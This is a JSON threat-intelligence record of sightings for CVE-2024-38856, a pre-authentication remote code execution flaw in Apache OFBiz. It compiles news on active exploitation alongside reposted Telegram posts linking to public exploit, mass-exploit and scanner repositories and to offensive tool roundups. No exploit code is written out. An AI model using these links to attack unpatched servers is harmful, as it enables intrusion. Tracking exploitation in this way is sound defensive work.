{"vulnerability": "CVE-2024-38856", "sightings": [{"uuid": "49034a87-f4cd-4145-8fa4-033f5e6553fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-08-27T18:10:02.000000Z"}, {"uuid": "bd9574f2-d6d6-4a50-bf42-0038544025fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:03.000000Z"}, {"uuid": "a4254f94-e266-4afa-a787-60180cc8539a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/113986582852375499", "content": "", "creation_timestamp": "2025-02-11T18:07:04.242970Z"}, {"uuid": "92fd4178-2f83-4b6c-993d-bc5f20b458b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://bsky.app/profile/darkwebinformer.bsky.social/post/3lhwaspmick27", "content": "", "creation_timestamp": "2025-02-11T18:07:08.973930Z"}, {"uuid": "d2df3876-de05-4401-a989-06ae67a2d75a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "33baaaaf-442f-4783-a650-5563122fcfe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb", "content": "", "creation_timestamp": "2024-06-17T15:39:13.000000Z"}, {"uuid": "f073cb6e-d572-4c2f-afd1-6f883369cca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:57.000000Z"}, {"uuid": "28b200f5-3ddb-4bd8-b6c8-45b029d18159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-38856", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3m34nw3i2l62b", "content": "", "creation_timestamp": "2025-10-14T02:16:18.572977Z"}, {"uuid": "777ee644-628c-4235-b45a-6bad97452095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "4b6bc12d-e855-434e-babd-11f411ba7b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lv7s7ydh6j2x", "content": "", "creation_timestamp": "2025-07-30T23:40:15.011950Z"}, {"uuid": "a3f45e58-73c6-4a32-930c-0b64cc17534d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/190", "content": "#exploit\n1. CVE-2024-7646:\nIngress-NGINX Annotation Validation Bypass\nhttps://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass\n\n2. CVE-2024-38856:\nApache OFBiz Pre-Authentication RCE (Scanner + Exploit)\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-20T04:46:41.000000Z"}, {"uuid": "626b26f9-a460-4114-80a8-c89874b5e4d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/4645e397-736b-45b9-b691-2ec5c8a89595", "content": "", "creation_timestamp": "2026-02-02T12:26:30.497574Z"}, {"uuid": "9e34e3d0-19ef-4ee3-8e0c-dc1bad4fd16a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8198", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aApache OFBiz RCE Scanner - CVE-2024-38856\nURL\uff1ahttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-08-08T02:47:20.000000Z"}, {"uuid": "34ff718e-243b-423d-b2c2-822cb580bc05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8293", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for CVE-2024-38856 affecting Apache OFBiz versions before 18.12.15\nURL\uff1ahttps://github.com/Praison001/CVE-2024-38856-ApacheOfBiz\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-18T15:30:21.000000Z"}, {"uuid": "818c2d02-2795-4a2b-9fb7-5d045b7c823d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38856 Exploit\nURL\uff1ahttps://github.com/0x20c/CVE-2024-38856-EXP\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-22T03:16:31.000000Z"}, {"uuid": "25a7b873-bd76-4f15-9e37-6ebcc6b54788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8220", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass Exploit - CVE-2024-38856 [Remote Code Execution]\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-38856-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-09T11:29:59.000000Z"}, {"uuid": "bd34a02f-1c32-41b5-8039-b2fa21e4b149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9695", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aTentang Pemindai & Eksploitasi Apache OFBiz RCE (CVE-2024-38856)\nURL\uff1ahttps://github.com/FakesiteSecurity/CVE-2024-38856_Scen\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2025-01-02T15:27:37.000000Z"}, {"uuid": "6acdb659-c4b4-4d86-ab51-efd8ff191821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8383", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1anuclei template to detect CVE-2024-38856 affecting Apache OFbiz before 18.12.15\nURL\uff1ahttps://github.com/north-vuln-intel/CVE-2024-38856-NUCLEI\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-27T20:31:01.000000Z"}, {"uuid": "31a3a4e5-57a9-4448-b6fb-3f7241588c02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8226", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPerform With Massive Apache OFBiz Zero-Day Scanner & RCE\nURL\uff1ahttps://github.com/ThatNotEasy/CVE-2024-38856\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-10T03:08:55.000000Z"}, {"uuid": "5d3a7962-9179-4677-8ef1-518f8e22a7a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "Telegram/rgVWXG_JF3lBzF944Q1uZEdqOiMVLUPqZjS8co3vkMC7j4o", "content": "", "creation_timestamp": "2025-10-10T09:00:05.000000Z"}, {"uuid": "b8b9afb9-f184-43ba-9f93-b2d9436fe6eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8389", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aApache OFBiz CVE-2024-38856\nURL\uff1ahttps://github.com/BBD-YZZ/CVE-2024-38856-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-08-28T07:14:13.000000Z"}, {"uuid": "d04f452f-6aa4-43ef-b44c-79489766ffd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9145", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38856 \u662f Apache OFBiz \u4e2d\u7684\u4e00\u4e2a\u4e25\u91cd\u6f0f\u6d1e\uff0c\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002 \nURL\uff1ahttps://github.com/XiaomingX/cveCVE-2024-38856-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-23T03:56:47.000000Z"}, {"uuid": "09e58320-725c-471e-92a2-de62db138fe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_News/705", "content": "\ud83d\udea8 News Alert!\n\nSource: Dark Web Informer - Cyber Threat Intelligence\nTitle: Apache OFBiz Exploit - CVE-2024-38856\nLink: https://darkwebinformer.com/apache-ofbiz-exploit-cve-2024-38856/", "creation_timestamp": "2025-02-11T18:16:13.000000Z"}, {"uuid": "d8ead8b7-302c-4416-b3f5-3c9649e040dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "Telegram/RtBtSsFKIk3Jaokw08JuXDeCFSR5TR3cziEK79g_JImSWQ", "content": "", "creation_timestamp": "2024-08-06T08:56:52.000000Z"}, {"uuid": "be5261d6-5f44-4a9e-bff0-084b1e10fe5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/2198", "content": "\ud83d\udca1CVE-2024-38856 - Apache OFBiz RCE Scanner & Exploit Released\n\nhttps://darkwebinformer.com/cve-2024-38856-apache-ofbiz-rce-scanner-exploit/", "creation_timestamp": "2024-08-08T17:00:58.000000Z"}, {"uuid": "6d900dc7-adcf-42ef-89e3-b3846b065980", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/19012", "content": "The Hacker News\nCISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.\nThe vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.", "creation_timestamp": "2024-08-28T10:07:16.000000Z"}, {"uuid": "e77e317e-749b-423e-968d-3f05cfe27fb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/11143", "content": "\u200aCVE-2024-38856 : A Practical Guide To Leveraging Bash And Nuclei\n\nhttps://kalilinuxtutorials.com/cve-2024-38856/", "creation_timestamp": "2024-08-24T09:50:29.000000Z"}, {"uuid": "d61f9fe7-0db4-455f-bb21-cd686ab067b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/8677", "content": "\u200aCVE-2024-38856: Critical Apache OFBiz Flaw Opens Door to Unauthorized Code Execution\n\nhttps://securityonline.info/cve-2024-38856-critical-apache-ofbiz-flaw-opens-door-to-unauthorized-code-execution/", "creation_timestamp": "2024-08-05T11:10:43.000000Z"}, {"uuid": "a1e9f644-0f82-4822-8fbf-0ecf784bdcb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "Telegram/6sGhaQz9bb_0Q9_HmpBktyh5m4xW9tO2qMpj4unBggJ165Yu", "content": "", "creation_timestamp": "2024-09-03T11:22:46.000000Z"}, {"uuid": "1910ca89-144b-4a24-9065-1290b79155d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/cvedetector/2440", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-38856 - Apache OFBiz Arbitrary Screen Rendering Authorization Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-38856 \nPublished : Aug. 5, 2024, 9:15 a.m. | 40\u00a0minutes ago \nDescription : Incorrect Authorization vulnerability in Apache OFBiz.  \n  \nThis issue affects Apache OFBiz: through 18.12.14.  \n  \nUsers are recommended to upgrade to version 18.12.15, which fixes the issue.  \n  \nUnauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-05T12:14:03.000000Z"}, {"uuid": "4abb1b1b-9852-4d30-a39e-bea0a59b3bd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "Telegram/1yUgmKS96BNCHiP-A5HD9dF6vFye_2fIX_5--BH9JWU94A", "content": "", "creation_timestamp": "2024-08-28T10:07:17.000000Z"}, {"uuid": "aad51588-3e3d-4f02-88f0-d8dec4230727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/12320", "content": "\ud83d\udea8Apache OFBiz Exploit - CVE-2024-38856\n\n\ud83d\udd17 PoC: https://github.com/AlissonFaoli/Apache-OFBiz-Exploit\n\ud83d\uded1 CVE: CVE-2024-38856\n\ud83d\udcbb Affected: Apache OFBiz \u2264 18.12.14\n\u26a0\ufe0f Type: Remote Code Execution (RCE)\n\ud83d\udd13 Exploitation: No authentication required", "creation_timestamp": "2025-02-11T19:06:57.000000Z"}, {"uuid": "abc90372-26ae-4f79-89ab-326586d74d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/17060", "content": "The Hacker News\nNew Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution\n\nA new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances.\nTracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15.\n\"The", "creation_timestamp": "2024-08-06T08:56:53.000000Z"}, {"uuid": "f3c9095c-52e4-43e7-8ae4-4dba52801412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/YourAnonTl3x/6673", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-01T10:57:46.000000Z"}, {"uuid": "d366a1d7-4810-4dd3-a3f1-d421f7135427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/4043", "content": "https://github.com/ThatNotEasy/CVE-2024-38856", "creation_timestamp": "2024-08-10T09:29:35.000000Z"}, {"uuid": "09d54aee-dfab-4a5e-9766-73102873030d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1254", "content": "https://github.com/Unrealisedd/nuclei-templates\nhttps://github.com/0xdln1/nuclei-templates\nhttps://github.com/securitytaters/nuclei-templates\nhttps://github.com/Sajibekanti/Nuclei_templates\nhttps://github.com/Vulker111/nuclei-templates\nhttps://github.com/smn666/Nuclei_templates_2024\nhttps://github.com/sylncereyes/The-Nuclei-Templates\nhttps://github.com/lupedsagaces/my-nuclei-templates\nhttps://github.com/ReksySec/3Nuclei-Templates\nhttps://github.com/Kuray12/prv8_nuclei_templates\nhttps://github.com/malectricasoftware/SwaggerX\nhttps://github.com/emanueldosreis/CVE-2024-38856\nhttps://github.com/aredspy/CVE-2021-41182-Tester\nhttps://github.com/ZoomerTedJackson/Salesforce-ContentDocument-DetectorNuclei-Template\nhttps://github.com/0xPugal/my-nuclei-templates\nhttps://github.com/Sajibekanti/Nuclei_templates\nhttps://github.com/sylncereyes/The-Nuclei-Templates\nhttps://github.com/lupedsagaces/my-nuclei-templates\nhttps://github.com/NoRed0x/nored0x-Nuclei-Templates\nhttps://github.com/smn666/Nuclei_templates_2024", "creation_timestamp": "2025-04-22T02:52:22.000000Z"}, {"uuid": "888f6f9d-4d4a-4658-b253-b9767554fd38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/3824", "content": "The Hacker News\nCISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.\nThe vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.", "creation_timestamp": "2024-08-28T10:07:16.000000Z"}, {"uuid": "fe0ab209-6917-4717-9047-948d9694f986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/anonymous_secures/862", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-01T10:57:28.000000Z"}, {"uuid": "125c6534-27be-4767-a9f8-088f313fdf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8637", "content": "Tools\u00a0 - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:58:22.000000Z"}, {"uuid": "a405f62b-b5dc-4744-8591-093bc40e6a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "Telegram/s-6x0SsG_2UF2F0LQDkdikvC0204B1iw9654a3zoOI7OzA", "content": "", "creation_timestamp": "2024-08-06T09:42:22.000000Z"}, {"uuid": "822ff7cc-3c07-4fb4-a22c-c299d61f1b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "Telegram/kbnLMXKpb1ZpGOs0iCXimnErr_duDcuBPPv43knNb5vnEg", "content": "", "creation_timestamp": "2024-08-28T08:59:39.000000Z"}, {"uuid": "6b15a233-5886-4c0f-b5a6-5dc6a2e1775c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/3339", "content": "The Hacker News\nNew Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution\n\nA new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances.\nTracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15.\n\"The", "creation_timestamp": "2024-08-06T08:56:53.000000Z"}, {"uuid": "7fa07d15-22bb-40e2-9372-cf08a3ab19b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/KomunitiSiber/2356", "content": "New Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution\nhttps://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html\n\nA new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances.\nTracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15.\n\"The", "creation_timestamp": "2024-08-06T07:15:14.000000Z"}, {"uuid": "c696b5e9-f06f-4017-8b5e-dd9dedf79e49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "Telegram/5ubDiOPhpE3YXrILNQXATGJJi9BbUr-zrtzW-n3816ppGAI", "content": "", "creation_timestamp": "2025-02-11T10:00:05.000000Z"}, {"uuid": "1df1a650-5a2b-4372-bf52-8e960d674362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/716", "content": "Tools  - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: 